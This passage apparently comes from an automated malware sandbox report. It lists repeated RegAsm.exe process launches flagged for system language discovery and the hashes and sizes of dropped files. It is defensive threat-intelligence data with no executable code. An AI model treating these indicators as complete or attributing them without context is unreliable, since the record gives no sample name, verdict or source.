C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3752
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1620
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2648
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:2532
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
425B
MD54eaca4566b22b01cd3bc115b9b0b2196
SHA1e743e0792c19f71740416e7b3c061d9f1336bf94
SHA25634ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
1KB
MD51dffbab5ecc6d06e8b259ad505a0dc2a
SHA10938ec61e4af55d7ee9d12708fdc55c72ccb090c
SHA256a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e
SHA51293209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76
-
Filesize
1KB
MD50c60b5e33986a239ce17f3ee5d4819c1
SHA1295fecdcc881a8c3c4c9d01e54b4430dae17b1d3
SHA2568dc7f6bc9c0baea43ebf459af40698e9e6628e5d893fa2808185177b4009dd36
SHA512d6abd1c2c0235801e0dc4a71042eabf3ac4079ff4827ebaa0394ffe644e51bd84d9844faa483ddf9304684db896d003b437bacf7a8cd213a96da26dc5228aebf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
270KB
MD5fcb797ad5f0600fabe1f0f32ea35063a
SHA1c869826b399026e6a394f260f697f7daae4b30f6
SHA256dd354350e31dd582e3060e1d9e7fc89d5eee5d6af36178095ade798b5f7715ad
SHA512e5750c59aead966926ace3a71b66fa1710930c9e2ac0a08766be63302f8d09ffaf0a4549de016d1297ba52066409814518a83d68e818f26fb94fb0c5551c4623
-
Filesize
6KB
MD565bd377a23adf5d7d3f8d902d3fcead2
SHA1570381a1edc203245fa6ff087efaed510a52e16d
SHA2566bd2a145c7017b2ee3434f4893f497999d2bd11818a56794a4b6df04c0cc6120
SHA51263de2c32dc2ac8098796fba837c3ccd93ad91af293e3add8cde56e5a2d70426d83a2b88ffcc3d2c02d3a895c2f1e3502bae405db0047f0267549075a0187c236
-
Filesize
1.2MB
MD5e92a3d6ca4bde49c6f0e1e343fdae44e
SHA102c27d2e076a19f54b133bb9c57b457b242d4116
SHA25616109cec66cf252e5b851739bc9f7639a1802a0c3998b3829950e52911ca6599
SHA51219df941ca771a23756936c0ee08fd5a9218784f2712c5735245aeacb532e46215654e4ddf83fbdd4b4d6a1aac3fb2a95119d883f4b3229cc7a4c690b197e24e7
-
Filesize
648KB
MD5134af0f2fc2a9cd8976a242b81f8840f
SHA18a7acfbe935abd112af0b4eb77dc87ba595f64a5
SHA2560268871620a416498e385020574721680eae7a9d887eb995fc6d3fef61d568d8
SHA512b711acabe2dd8223accb1571f2c68d099f0977d350df4cf74b969e9b4a6fe1a563ff91cf8f81105ab3e6a94d973f6bded067e22b81192dc04ceff4212057169c